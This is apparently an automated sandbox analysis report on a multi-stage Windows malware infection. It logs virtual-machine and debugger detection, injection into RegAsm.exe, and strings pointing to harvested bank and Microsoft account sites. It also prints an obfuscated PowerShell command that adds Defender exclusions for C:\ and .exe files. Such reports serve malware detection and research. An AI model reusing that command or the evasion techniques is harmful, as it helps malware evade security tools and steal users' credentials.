Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3000	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Thread sleep count: Count: 1414 delay: -42
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Thread sleep count: Count: 3169 delay: -10

Source: C:\Users\user\Desktop\random.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_00406301 FindFirstFileW,FindClose,	25_2_00406301
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Code function: 25_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	25_2_00406CC7
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0102A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	51_2_0102A1E2
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0102A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	51_2_0102A087
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0102A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	51_2_0102A570
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	51_2_0101E472
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FEC622 FindFirstFileExW,	51_2_00FEC622
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_010266DC FindFirstFileW,FindNextFileW,FindClose,	51_2_010266DC
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_01027333 FindFirstFileW,FindClose,	51_2_01027333
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_010273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	51_2_010273D4
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	51_2_0101D921
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_0101DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	51_2_0101DC54

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_00FB5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

51_2_00FB5FC8

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\789919
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\789919\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\

Source: Amcache.hve.23.dr	Binary or memory string: VMware
Source: PfOHmro.exe, 00000013.00000002.2384802133.0000000006592000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}l&
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: tmp409A.tmp.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: tmp409A.tmp.19.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: tmp409A.tmp.19.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: tmp409A.tmp.19.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.23.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: tmp409A.tmp.19.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: tmp409A.tmp.19.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PfOHmro.exe, 00000013.00000002.2384802133.0000000006592000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: tmp409A.tmp.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: tmp409A.tmp.19.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Amcache.hve.23.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: tmp409A.tmp.19.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.23.dr	Binary or memory string: vmci.sys
Source: tmp409A.tmp.19.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: tmp409A.tmp.19.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: tmp409A.tmp.19.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: random.exe, 00000000.00000003.898515150.000000000169F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: random.exe, 00000000.00000003.898515150.000000000169F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DD
Source: tmp409A.tmp.19.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.23.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.23.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.23.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.23.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: tmp409A.tmp.19.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.23.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.23.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.23.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: tmp409A.tmp.19.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.23.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.23.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.23.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\T
Source: Amcache.hve.23.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: tmp409A.tmp.19.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: tmp409A.tmp.19.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: mIrI3a9.exe, 00000034.00000002.1807015480.000000000549E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.23.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: rapes.exe, rapes.exe, 0000000B.00000002.3355230281.0000000000F83000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.23.dr	Binary or memory string: VMware Virtual USB Mouse
Source: tmp409A.tmp.19.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.23.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.23.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.23.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.23.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.23.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.23.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: PfOHmro.exe, 00000013.00000002.2348586829.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: tmp409A.tmp.19.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: tmp409A.tmp.19.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.23.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.23.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: PfOHmro.exe, 00000013.00000002.2348586829.00000000010CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: tmp409A.tmp.19.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: tmp409A.tmp.19.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.23.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.23.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: tmp409A.tmp.19.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.23.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.23.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: rapes.exe, 0000000B.00000002.3350049623.0000000000C06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: tmp409A.tmp.19.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: random.exe, 00000000.00000002.930135945.0000000001003000.00000040.00000001.01000000.00000003.sdmp, rapes.exe, 00000001.00000002.966425690.0000000000F83000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 00000002.00000002.969188979.0000000000F83000.00000040.00000001.01000000.00000007.sdmp, rapes.exe, 0000000B.00000002.3355230281.0000000000F83000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: tmp409A.tmp.19.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_053D0B04 Start: 053D0BC0 End: 053D0AD0

0_2_053D0B04

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_0537048E rdtsc

0_2_0537048E

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_0102F4FF BlockInput,

51_2_0102F4FF

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_00FB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

51_2_00FB338B

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Code function: 25_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

25_2_00406328

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DADB60 mov eax, dword ptr fs:[00000030h]	11_2_00DADB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 11_2_00DB5FF2 mov eax, dword ptr fs:[00000030h]	11_2_00DB5FF2
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 16_2_031921B1 mov edi, dword ptr fs:[00000030h]	16_2_031921B1
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Code function: 16_2_0319232E mov edi, dword ptr fs:[00000030h]	16_2_0319232E
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD5058 mov eax, dword ptr fs:[00000030h]	51_2_00FD5058

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_01012150 GetProcessHeap,HeapAlloc,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,CreateThread,

51_2_01012150

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FE2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	51_2_00FE2992
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	51_2_00FD0BAF
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD0D45 SetUnhandledExceptionFilter,	51_2_00FD0D45
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Code function: 51_2_00FD0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	51_2_00FD0F91

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe

Code function: 16_2_031921B1 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

16_2_031921B1

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Memory written: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960064
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9600C8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96012C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960190
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9601F4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960258
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9602BC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960320
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960384
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9603E8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96044C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9604B0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960514
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960578
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9605DC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960640
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9606A4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960708
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96076C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9607D0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960834
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960898
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9608FC
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960960
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9609C4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960A28
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960A8C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960AF0
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960B54
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960BB8
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960C1C
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960C80
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960CE4
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960D48
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960DAC
